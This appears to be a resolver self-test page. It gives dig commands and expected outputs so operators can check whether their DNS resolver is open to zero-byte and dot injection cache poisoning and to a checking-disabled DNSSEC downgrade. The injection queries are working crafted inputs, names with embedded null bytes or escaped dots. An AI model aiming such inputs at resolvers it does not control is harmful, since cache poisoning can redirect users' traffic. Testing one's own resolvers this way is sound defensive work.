Manually testing for the vulnerability
This page contains instructions on how to test manually for the vulnerability. We provide instructions for triggering the required queries via the tool dig. If you do not have a copy of dig on your system, it can be downloaded at https://www.isc.org/download/ as part of the BIND9 download package.
If you are using Windows, do not use the included nslookup tool, as this tool is not able to trigger all required queries.
In each command, you have to replace @your-resolver-ip with the ip address of your resolver, such as @192.168.0.1.
Test explanation
Each test is split into 2 queries.
The first query is the injection query which aims to inject a test record into the target resolver's cache.
- If you see a different result as the expected one displayed as a result to an injection query, this means your resolver behaves unexpectedly, but does not neccessarily mean it is vulnerable to the attack.
The seconds query is the verification query, which aims to identfy if the record could be injected.
In out case, we use 2 IP addresses, one representing a vulnerable and one representing a non-vulnerable result.
- If you see the address
141.12.174.89in response to a verification query, this means your resolver is not vulnerable to this attack. - If you see the address
141.12.174.88in response to a verification query, this means your resolver is vulnerable to this attack.
Zero byte injection (direct, variant 1)
Injection query
$ dig '1.victim.test2.xdi-attack.net.\000.test2.xdi-attack.net.' @your-resolver-ip
Expected result:
;; ANSWER SECTION:
1.victim.test2.xdi-attack.net.\000.test2.xdi-attack.net. 300 IN A 141.12.174.88
Verification query
$ dig '1.victim.test2.xdi-attack.net' @your-resolver-ip
Result if not vulnerable:
;; ANSWER SECTION:
1.victim.test2.xdi-attack.net. 300 IN A 141.12.174.89 <- non-vulnerable
Result if vulnerable:
;; ANSWER SECTION:
1.victim.test2.xdi-attack.net. 300 IN A 141.12.174.88 <- vulnerable
Zero byte injection (direct, variant 2)
Injection query
$ dig '3.victim.test2.xdi-attack.net\000.test2.xdi-attack.net.' @your-resolver-ip
Expected result:
;; ANSWER SECTION:
3.victim.test2.xdi-attack.net\000.test2.xdi-attack.net. 300 IN A 141.12.174.88
Verification query
$ dig '3.victim.test2.xdi-attack.net' @your-resolver-ip
Result if not vulnerable:
;; ANSWER SECTION:
3.victim.test2.xdi-attack.net. 300 IN A 141.12.174.89 <- non-vulnerable
Result if vulnerable:
;; ANSWER SECTION:
3.victim.test2.xdi-attack.net. 300 IN A 141.12.174.88 <- vulnerable
Zero byte injection (cname)
Injection query
$ dig '2.cnamezero.test2.xdi-attack.net' @your-resolver-ip
Expected result:
;; ANSWER SECTION:
2.cnamezero.test2.xdi-attack.net. 300 IN CNAME 2.victim.test2.xdi-attack.net.\000.test2.xdi-attack.net.
2.victim.test2.xdi-attack.net.\000.test2.xdi-attack.net. 300 IN A 141.12.174.88
Verification query
$ dig '2.victim.test2.xdi-attack.net'
Result if not vulnerable:
;; ANSWER SECTION:
2.victim.test2.xdi-attack.net. 300 IN A 141.12.174.89 <- non-vulnerable
Result if vulnerable:
;; ANSWER SECTION:
2.victim.test2.xdi-attack.net. 300 IN A 141.12.174.88 <- vulnerable
Dot injection (direct)
Injection query
$ dig '1.victim\.dot.test2.xdi-attack.net' @your-resolver-ip
Expected result:
;; ANSWER SECTION:
1.victim\.dot.test2.xdi-attack.net. 300 IN A 141.12.174.88
Verification query
$ dig '1.victim.dot.test2.xdi-attack.net' @your-resolver-ip
Result if not vulnerable:
;; ANSWER SECTION:
1.victim.dot.test2.xdi-attack.net. 300 IN A 141.12.174.89 <- non-vulnerable
Result if vulnerable:
;; ANSWER SECTION:
1.victim.dot.test2.xdi-attack.net. 300 IN A 141.12.174.88 <- vulnerable
Dot injection (cname)
Injection query
$ dig '2.cnamedot.test2.xdi-attack.net' @your-resolver-ip
Expected result:
;; ANSWER SECTION:
2.cnamedot.test2.xdi-attack.net. 300 IN CNAME 2.victim\.dot.test2.xdi-attack.net.
2.victim\.dot.test2.xdi-attack.net. 300 IN A 141.12.174.88
Verification query
$ dig '2.victim.dot.test2.xdi-attack.net' @your-resolver-ip
Result if not vulnerable:
;; ANSWER SECTION:
2.victim.dot.test2.xdi-attack.net. 300 IN A 141.12.174.89 <- non-vulnerable
Result if vulnerable:
;; ANSWER SECTION:
2.victim.dot.test2.xdi-attack.net. 300 IN A 141.12.174.88 <- vulnerable
Checking disabled (CD = 1) DNSSEC downgrade
Pre-check
First, check if your resolver validates DNSSEC, otherwise testing for the vulnerability is redundant.
$ dig sigfail.verteiltesysteme.net @your-resolver-ip
(should return SERVFAIL/nothing)
Injection query
$ dig sigfail.verteiltesysteme.net +cdflag @your-resolver-ip
(should always return 134.91.78.139)
Verification query
$ dig sigfail.verteiltesysteme.net +short @your-resolver-ip
(returns 134.91.78.139 if vulnerable, should return SERVFAIL/nothing)